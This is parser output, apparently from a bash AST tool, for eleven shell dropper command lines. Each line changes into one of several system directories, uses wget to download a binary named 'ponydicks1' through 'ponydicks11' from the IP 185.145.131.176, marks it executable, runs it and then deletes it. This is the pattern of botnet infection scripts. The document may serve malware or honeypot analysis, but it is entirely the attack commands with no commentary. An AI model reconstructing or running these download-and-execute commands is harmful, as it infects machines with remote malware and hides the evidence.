ListNode(lineno=2, pos=(12, 162), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 37), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 37), word='/var/system'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(38, 40)),
  CommandNode(lineno=2, pos=(41, 48), parts=[
    WordNode(lineno=2, pos=(41, 43), word='cd'),
    WordNode(lineno=2, pos=(44, 48), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(49, 51)),
  CommandNode(lineno=2, pos=(52, 60), parts=[
    WordNode(lineno=2, pos=(52, 54), word='cd'),
    WordNode(lineno=2, pos=(55, 60), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(61, 63)),
  CommandNode(lineno=2, pos=(64, 68), parts=[
    WordNode(lineno=2, pos=(64, 66), word='cd'),
    WordNode(lineno=2, pos=(67, 68), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(68, 69)),
  CommandNode(lineno=2, pos=(70, 108), parts=[
    WordNode(lineno=2, pos=(70, 74), word='wget'),
    WordNode(lineno=2, pos=(75, 108), word='http://185.145.131.176/ponydicks1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(108, 109)),
  CommandNode(lineno=2, pos=(110, 129), parts=[
    WordNode(lineno=2, pos=(110, 115), word='chmod'),
    WordNode(lineno=2, pos=(116, 118), word='+x'),
    WordNode(lineno=2, pos=(119, 129), word='ponydicks1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(129, 130)),
  CommandNode(lineno=2, pos=(131, 143), parts=[
    WordNode(lineno=2, pos=(131, 143), word='./ponydicks1'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(143, 144)),
  CommandNode(lineno=2, pos=(145, 162), parts=[
    WordNode(lineno=2, pos=(145, 147), word='rm'),
    WordNode(lineno=2, pos=(148, 151), word='-rf'),
    WordNode(lineno=2, pos=(152, 162), word='ponydicks1'),
  ]),
])
ListNode(lineno=3, pos=(163, 313), parts=[
  CommandNode(lineno=3, pos=(163, 170), parts=[
    WordNode(lineno=3, pos=(163, 165), word='cd'),
    WordNode(lineno=3, pos=(166, 170), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(171, 173)),
  CommandNode(lineno=3, pos=(174, 188), parts=[
    WordNode(lineno=3, pos=(174, 176), word='cd'),
    WordNode(lineno=3, pos=(177, 188), word='/var/system'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(189, 191)),
  CommandNode(lineno=3, pos=(192, 199), parts=[
    WordNode(lineno=3, pos=(192, 194), word='cd'),
    WordNode(lineno=3, pos=(195, 199), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(200, 202)),
  CommandNode(lineno=3, pos=(203, 211), parts=[
    WordNode(lineno=3, pos=(203, 205), word='cd'),
    WordNode(lineno=3, pos=(206, 211), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(212, 214)),
  CommandNode(lineno=3, pos=(215, 219), parts=[
    WordNode(lineno=3, pos=(215, 217), word='cd'),
    WordNode(lineno=3, pos=(218, 219), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(219, 220)),
  CommandNode(lineno=3, pos=(221, 259), parts=[
    WordNode(lineno=3, pos=(221, 225), word='wget'),
    WordNode(lineno=3, pos=(226, 259), word='http://185.145.131.176/ponydicks2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(259, 260)),
  CommandNode(lineno=3, pos=(261, 280), parts=[
    WordNode(lineno=3, pos=(261, 266), word='chmod'),
    WordNode(lineno=3, pos=(267, 269), word='+x'),
    WordNode(lineno=3, pos=(270, 280), word='ponydicks2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(280, 281)),
  CommandNode(lineno=3, pos=(282, 294), parts=[
    WordNode(lineno=3, pos=(282, 294), word='./ponydicks2'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(294, 295)),
  CommandNode(lineno=3, pos=(296, 313), parts=[
    WordNode(lineno=3, pos=(296, 298), word='rm'),
    WordNode(lineno=3, pos=(299, 302), word='-rf'),
    WordNode(lineno=3, pos=(303, 313), word='ponydicks2'),
  ]),
])
ListNode(lineno=4, pos=(314, 464), parts=[
  CommandNode(lineno=4, pos=(314, 321), parts=[
    WordNode(lineno=4, pos=(314, 316), word='cd'),
    WordNode(lineno=4, pos=(317, 321), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(322, 324)),
  CommandNode(lineno=4, pos=(325, 339), parts=[
    WordNode(lineno=4, pos=(325, 327), word='cd'),
    WordNode(lineno=4, pos=(328, 339), word='/var/system'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(340, 342)),
  CommandNode(lineno=4, pos=(343, 350), parts=[
    WordNode(lineno=4, pos=(343, 345), word='cd'),
    WordNode(lineno=4, pos=(346, 350), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(351, 353)),
  CommandNode(lineno=4, pos=(354, 362), parts=[
    WordNode(lineno=4, pos=(354, 356), word='cd'),
    WordNode(lineno=4, pos=(357, 362), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(363, 365)),
  CommandNode(lineno=4, pos=(366, 370), parts=[
    WordNode(lineno=4, pos=(366, 368), word='cd'),
    WordNode(lineno=4, pos=(369, 370), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(370, 371)),
  CommandNode(lineno=4, pos=(372, 410), parts=[
    WordNode(lineno=4, pos=(372, 376), word='wget'),
    WordNode(lineno=4, pos=(377, 410), word='http://185.145.131.176/ponydicks3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(410, 411)),
  CommandNode(lineno=4, pos=(412, 431), parts=[
    WordNode(lineno=4, pos=(412, 417), word='chmod'),
    WordNode(lineno=4, pos=(418, 420), word='+x'),
    WordNode(lineno=4, pos=(421, 431), word='ponydicks3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(431, 432)),
  CommandNode(lineno=4, pos=(433, 445), parts=[
    WordNode(lineno=4, pos=(433, 445), word='./ponydicks3'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(445, 446)),
  CommandNode(lineno=4, pos=(447, 464), parts=[
    WordNode(lineno=4, pos=(447, 449), word='rm'),
    WordNode(lineno=4, pos=(450, 453), word='-rf'),
    WordNode(lineno=4, pos=(454, 464), word='ponydicks3'),
  ]),
])
ListNode(lineno=5, pos=(465, 615), parts=[
  CommandNode(lineno=5, pos=(465, 472), parts=[
    WordNode(lineno=5, pos=(465, 467), word='cd'),
    WordNode(lineno=5, pos=(468, 472), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(473, 475)),
  CommandNode(lineno=5, pos=(476, 490), parts=[
    WordNode(lineno=5, pos=(476, 478), word='cd'),
    WordNode(lineno=5, pos=(479, 490), word='/var/system'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(491, 493)),
  CommandNode(lineno=5, pos=(494, 501), parts=[
    WordNode(lineno=5, pos=(494, 496), word='cd'),
    WordNode(lineno=5, pos=(497, 501), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(502, 504)),
  CommandNode(lineno=5, pos=(505, 513), parts=[
    WordNode(lineno=5, pos=(505, 507), word='cd'),
    WordNode(lineno=5, pos=(508, 513), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(514, 516)),
  CommandNode(lineno=5, pos=(517, 521), parts=[
    WordNode(lineno=5, pos=(517, 519), word='cd'),
    WordNode(lineno=5, pos=(520, 521), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(521, 522)),
  CommandNode(lineno=5, pos=(523, 561), parts=[
    WordNode(lineno=5, pos=(523, 527), word='wget'),
    WordNode(lineno=5, pos=(528, 561), word='http://185.145.131.176/ponydicks4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(561, 562)),
  CommandNode(lineno=5, pos=(563, 582), parts=[
    WordNode(lineno=5, pos=(563, 568), word='chmod'),
    WordNode(lineno=5, pos=(569, 571), word='+x'),
    WordNode(lineno=5, pos=(572, 582), word='ponydicks4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(582, 583)),
  CommandNode(lineno=5, pos=(584, 596), parts=[
    WordNode(lineno=5, pos=(584, 596), word='./ponydicks4'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(596, 597)),
  CommandNode(lineno=5, pos=(598, 615), parts=[
    WordNode(lineno=5, pos=(598, 600), word='rm'),
    WordNode(lineno=5, pos=(601, 604), word='-rf'),
    WordNode(lineno=5, pos=(605, 615), word='ponydicks4'),
  ]),
])
ListNode(lineno=6, pos=(616, 766), parts=[
  CommandNode(lineno=6, pos=(616, 623), parts=[
    WordNode(lineno=6, pos=(616, 618), word='cd'),
    WordNode(lineno=6, pos=(619, 623), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(624, 626)),
  CommandNode(lineno=6, pos=(627, 641), parts=[
    WordNode(lineno=6, pos=(627, 629), word='cd'),
    WordNode(lineno=6, pos=(630, 641), word='/var/system'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(642, 644)),
  CommandNode(lineno=6, pos=(645, 652), parts=[
    WordNode(lineno=6, pos=(645, 647), word='cd'),
    WordNode(lineno=6, pos=(648, 652), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(653, 655)),
  CommandNode(lineno=6, pos=(656, 664), parts=[
    WordNode(lineno=6, pos=(656, 658), word='cd'),
    WordNode(lineno=6, pos=(659, 664), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(665, 667)),
  CommandNode(lineno=6, pos=(668, 672), parts=[
    WordNode(lineno=6, pos=(668, 670), word='cd'),
    WordNode(lineno=6, pos=(671, 672), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(672, 673)),
  CommandNode(lineno=6, pos=(674, 712), parts=[
    WordNode(lineno=6, pos=(674, 678), word='wget'),
    WordNode(lineno=6, pos=(679, 712), word='http://185.145.131.176/ponydicks5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(712, 713)),
  CommandNode(lineno=6, pos=(714, 733), parts=[
    WordNode(lineno=6, pos=(714, 719), word='chmod'),
    WordNode(lineno=6, pos=(720, 722), word='+x'),
    WordNode(lineno=6, pos=(723, 733), word='ponydicks5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(733, 734)),
  CommandNode(lineno=6, pos=(735, 747), parts=[
    WordNode(lineno=6, pos=(735, 747), word='./ponydicks5'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(747, 748)),
  CommandNode(lineno=6, pos=(749, 766), parts=[
    WordNode(lineno=6, pos=(749, 751), word='rm'),
    WordNode(lineno=6, pos=(752, 755), word='-rf'),
    WordNode(lineno=6, pos=(756, 766), word='ponydicks5'),
  ]),
])
ListNode(lineno=7, pos=(767, 917), parts=[
  CommandNode(lineno=7, pos=(767, 774), parts=[
    WordNode(lineno=7, pos=(767, 769), word='cd'),
    WordNode(lineno=7, pos=(770, 774), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(775, 777)),
  CommandNode(lineno=7, pos=(778, 792), parts=[
    WordNode(lineno=7, pos=(778, 780), word='cd'),
    WordNode(lineno=7, pos=(781, 792), word='/var/system'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(793, 795)),
  CommandNode(lineno=7, pos=(796, 803), parts=[
    WordNode(lineno=7, pos=(796, 798), word='cd'),
    WordNode(lineno=7, pos=(799, 803), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(804, 806)),
  CommandNode(lineno=7, pos=(807, 815), parts=[
    WordNode(lineno=7, pos=(807, 809), word='cd'),
    WordNode(lineno=7, pos=(810, 815), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(816, 818)),
  CommandNode(lineno=7, pos=(819, 823), parts=[
    WordNode(lineno=7, pos=(819, 821), word='cd'),
    WordNode(lineno=7, pos=(822, 823), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(823, 824)),
  CommandNode(lineno=7, pos=(825, 863), parts=[
    WordNode(lineno=7, pos=(825, 829), word='wget'),
    WordNode(lineno=7, pos=(830, 863), word='http://185.145.131.176/ponydicks6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(863, 864)),
  CommandNode(lineno=7, pos=(865, 884), parts=[
    WordNode(lineno=7, pos=(865, 870), word='chmod'),
    WordNode(lineno=7, pos=(871, 873), word='+x'),
    WordNode(lineno=7, pos=(874, 884), word='ponydicks6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(884, 885)),
  CommandNode(lineno=7, pos=(886, 898), parts=[
    WordNode(lineno=7, pos=(886, 898), word='./ponydicks6'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(898, 899)),
  CommandNode(lineno=7, pos=(900, 917), parts=[
    WordNode(lineno=7, pos=(900, 902), word='rm'),
    WordNode(lineno=7, pos=(903, 906), word='-rf'),
    WordNode(lineno=7, pos=(907, 917), word='ponydicks6'),
  ]),
])
ListNode(lineno=8, pos=(918, 1068), parts=[
  CommandNode(lineno=8, pos=(918, 925), parts=[
    WordNode(lineno=8, pos=(918, 920), word='cd'),
    WordNode(lineno=8, pos=(921, 925), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(926, 928)),
  CommandNode(lineno=8, pos=(929, 943), parts=[
    WordNode(lineno=8, pos=(929, 931), word='cd'),
    WordNode(lineno=8, pos=(932, 943), word='/var/system'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(944, 946)),
  CommandNode(lineno=8, pos=(947, 954), parts=[
    WordNode(lineno=8, pos=(947, 949), word='cd'),
    WordNode(lineno=8, pos=(950, 954), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(955, 957)),
  CommandNode(lineno=8, pos=(958, 966), parts=[
    WordNode(lineno=8, pos=(958, 960), word='cd'),
    WordNode(lineno=8, pos=(961, 966), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(967, 969)),
  CommandNode(lineno=8, pos=(970, 974), parts=[
    WordNode(lineno=8, pos=(970, 972), word='cd'),
    WordNode(lineno=8, pos=(973, 974), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(974, 975)),
  CommandNode(lineno=8, pos=(976, 1014), parts=[
    WordNode(lineno=8, pos=(976, 980), word='wget'),
    WordNode(lineno=8, pos=(981, 1014), word='http://185.145.131.176/ponydicks7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1014, 1015)),
  CommandNode(lineno=8, pos=(1016, 1035), parts=[
    WordNode(lineno=8, pos=(1016, 1021), word='chmod'),
    WordNode(lineno=8, pos=(1022, 1024), word='+x'),
    WordNode(lineno=8, pos=(1025, 1035), word='ponydicks7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1035, 1036)),
  CommandNode(lineno=8, pos=(1037, 1049), parts=[
    WordNode(lineno=8, pos=(1037, 1049), word='./ponydicks7'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(1049, 1050)),
  CommandNode(lineno=8, pos=(1051, 1068), parts=[
    WordNode(lineno=8, pos=(1051, 1053), word='rm'),
    WordNode(lineno=8, pos=(1054, 1057), word='-rf'),
    WordNode(lineno=8, pos=(1058, 1068), word='ponydicks7'),
  ]),
])
ListNode(lineno=9, pos=(1069, 1219), parts=[
  CommandNode(lineno=9, pos=(1069, 1076), parts=[
    WordNode(lineno=9, pos=(1069, 1071), word='cd'),
    WordNode(lineno=9, pos=(1072, 1076), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1077, 1079)),
  CommandNode(lineno=9, pos=(1080, 1094), parts=[
    WordNode(lineno=9, pos=(1080, 1082), word='cd'),
    WordNode(lineno=9, pos=(1083, 1094), word='/var/system'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1095, 1097)),
  CommandNode(lineno=9, pos=(1098, 1105), parts=[
    WordNode(lineno=9, pos=(1098, 1100), word='cd'),
    WordNode(lineno=9, pos=(1101, 1105), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1106, 1108)),
  CommandNode(lineno=9, pos=(1109, 1117), parts=[
    WordNode(lineno=9, pos=(1109, 1111), word='cd'),
    WordNode(lineno=9, pos=(1112, 1117), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1118, 1120)),
  CommandNode(lineno=9, pos=(1121, 1125), parts=[
    WordNode(lineno=9, pos=(1121, 1123), word='cd'),
    WordNode(lineno=9, pos=(1124, 1125), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1125, 1126)),
  CommandNode(lineno=9, pos=(1127, 1165), parts=[
    WordNode(lineno=9, pos=(1127, 1131), word='wget'),
    WordNode(lineno=9, pos=(1132, 1165), word='http://185.145.131.176/ponydicks8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1165, 1166)),
  CommandNode(lineno=9, pos=(1167, 1186), parts=[
    WordNode(lineno=9, pos=(1167, 1172), word='chmod'),
    WordNode(lineno=9, pos=(1173, 1175), word='+x'),
    WordNode(lineno=9, pos=(1176, 1186), word='ponydicks8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1186, 1187)),
  CommandNode(lineno=9, pos=(1188, 1200), parts=[
    WordNode(lineno=9, pos=(1188, 1200), word='./ponydicks8'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1200, 1201)),
  CommandNode(lineno=9, pos=(1202, 1219), parts=[
    WordNode(lineno=9, pos=(1202, 1204), word='rm'),
    WordNode(lineno=9, pos=(1205, 1208), word='-rf'),
    WordNode(lineno=9, pos=(1209, 1219), word='ponydicks8'),
  ]),
])
ListNode(lineno=10, pos=(1220, 1370), parts=[
  CommandNode(lineno=10, pos=(1220, 1227), parts=[
    WordNode(lineno=10, pos=(1220, 1222), word='cd'),
    WordNode(lineno=10, pos=(1223, 1227), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1228, 1230)),
  CommandNode(lineno=10, pos=(1231, 1245), parts=[
    WordNode(lineno=10, pos=(1231, 1233), word='cd'),
    WordNode(lineno=10, pos=(1234, 1245), word='/var/system'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1246, 1248)),
  CommandNode(lineno=10, pos=(1249, 1256), parts=[
    WordNode(lineno=10, pos=(1249, 1251), word='cd'),
    WordNode(lineno=10, pos=(1252, 1256), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1257, 1259)),
  CommandNode(lineno=10, pos=(1260, 1268), parts=[
    WordNode(lineno=10, pos=(1260, 1262), word='cd'),
    WordNode(lineno=10, pos=(1263, 1268), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1269, 1271)),
  CommandNode(lineno=10, pos=(1272, 1276), parts=[
    WordNode(lineno=10, pos=(1272, 1274), word='cd'),
    WordNode(lineno=10, pos=(1275, 1276), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1276, 1277)),
  CommandNode(lineno=10, pos=(1278, 1316), parts=[
    WordNode(lineno=10, pos=(1278, 1282), word='wget'),
    WordNode(lineno=10, pos=(1283, 1316), word='http://185.145.131.176/ponydicks9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1316, 1317)),
  CommandNode(lineno=10, pos=(1318, 1337), parts=[
    WordNode(lineno=10, pos=(1318, 1323), word='chmod'),
    WordNode(lineno=10, pos=(1324, 1326), word='+x'),
    WordNode(lineno=10, pos=(1327, 1337), word='ponydicks9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1337, 1338)),
  CommandNode(lineno=10, pos=(1339, 1351), parts=[
    WordNode(lineno=10, pos=(1339, 1351), word='./ponydicks9'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1351, 1352)),
  CommandNode(lineno=10, pos=(1353, 1370), parts=[
    WordNode(lineno=10, pos=(1353, 1355), word='rm'),
    WordNode(lineno=10, pos=(1356, 1359), word='-rf'),
    WordNode(lineno=10, pos=(1360, 1370), word='ponydicks9'),
  ]),
])
ListNode(lineno=11, pos=(1371, 1525), parts=[
  CommandNode(lineno=11, pos=(1371, 1378), parts=[
    WordNode(lineno=11, pos=(1371, 1373), word='cd'),
    WordNode(lineno=11, pos=(1374, 1378), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1379, 1381)),
  CommandNode(lineno=11, pos=(1382, 1396), parts=[
    WordNode(lineno=11, pos=(1382, 1384), word='cd'),
    WordNode(lineno=11, pos=(1385, 1396), word='/var/system'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1397, 1399)),
  CommandNode(lineno=11, pos=(1400, 1407), parts=[
    WordNode(lineno=11, pos=(1400, 1402), word='cd'),
    WordNode(lineno=11, pos=(1403, 1407), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1408, 1410)),
  CommandNode(lineno=11, pos=(1411, 1419), parts=[
    WordNode(lineno=11, pos=(1411, 1413), word='cd'),
    WordNode(lineno=11, pos=(1414, 1419), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1420, 1422)),
  CommandNode(lineno=11, pos=(1423, 1427), parts=[
    WordNode(lineno=11, pos=(1423, 1425), word='cd'),
    WordNode(lineno=11, pos=(1426, 1427), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1427, 1428)),
  CommandNode(lineno=11, pos=(1429, 1468), parts=[
    WordNode(lineno=11, pos=(1429, 1433), word='wget'),
    WordNode(lineno=11, pos=(1434, 1468), word='http://185.145.131.176/ponydicks10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1468, 1469)),
  CommandNode(lineno=11, pos=(1470, 1490), parts=[
    WordNode(lineno=11, pos=(1470, 1475), word='chmod'),
    WordNode(lineno=11, pos=(1476, 1478), word='+x'),
    WordNode(lineno=11, pos=(1479, 1490), word='ponydicks10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1490, 1491)),
  CommandNode(lineno=11, pos=(1492, 1505), parts=[
    WordNode(lineno=11, pos=(1492, 1505), word='./ponydicks10'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1505, 1506)),
  CommandNode(lineno=11, pos=(1507, 1525), parts=[
    WordNode(lineno=11, pos=(1507, 1509), word='rm'),
    WordNode(lineno=11, pos=(1510, 1513), word='-rf'),
    WordNode(lineno=11, pos=(1514, 1525), word='ponydicks10'),
  ]),
])
ListNode(lineno=12, pos=(1526, 1680), parts=[
  CommandNode(lineno=12, pos=(1526, 1533), parts=[
    WordNode(lineno=12, pos=(1526, 1528), word='cd'),
    WordNode(lineno=12, pos=(1529, 1533), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1534, 1536)),
  CommandNode(lineno=12, pos=(1537, 1551), parts=[
    WordNode(lineno=12, pos=(1537, 1539), word='cd'),
    WordNode(lineno=12, pos=(1540, 1551), word='/var/system'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1552, 1554)),
  CommandNode(lineno=12, pos=(1555, 1562), parts=[
    WordNode(lineno=12, pos=(1555, 1557), word='cd'),
    WordNode(lineno=12, pos=(1558, 1562), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1563, 1565)),
  CommandNode(lineno=12, pos=(1566, 1574), parts=[
    WordNode(lineno=12, pos=(1566, 1568), word='cd'),
    WordNode(lineno=12, pos=(1569, 1574), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1575, 1577)),
  CommandNode(lineno=12, pos=(1578, 1582), parts=[
    WordNode(lineno=12, pos=(1578, 1580), word='cd'),
    WordNode(lineno=12, pos=(1581, 1582), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1582, 1583)),
  CommandNode(lineno=12, pos=(1584, 1623), parts=[
    WordNode(lineno=12, pos=(1584, 1588), word='wget'),
    WordNode(lineno=12, pos=(1589, 1623), word='http://185.145.131.176/ponydicks11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1623, 1624)),
  CommandNode(lineno=12, pos=(1625, 1645), parts=[
    WordNode(lineno=12, pos=(1625, 1630), word='chmod'),
    WordNode(lineno=12, pos=(1631, 1633), word='+x'),
    WordNode(lineno=12, pos=(1634, 1645), word='ponydicks11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1645, 1646)),
  CommandNode(lineno=12, pos=(1647, 1660), parts=[
    WordNode(lineno=12, pos=(1647, 1660), word='./ponydicks11'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1660, 1661)),
  CommandNode(lineno=12, pos=(1662, 1680), parts=[
    WordNode(lineno=12, pos=(1662, 1664), word='rm'),
    WordNode(lineno=12, pos=(1665, 1668), word='-rf'),
    WordNode(lineno=12, pos=(1669, 1680), word='ponydicks11'),
  ]),
])
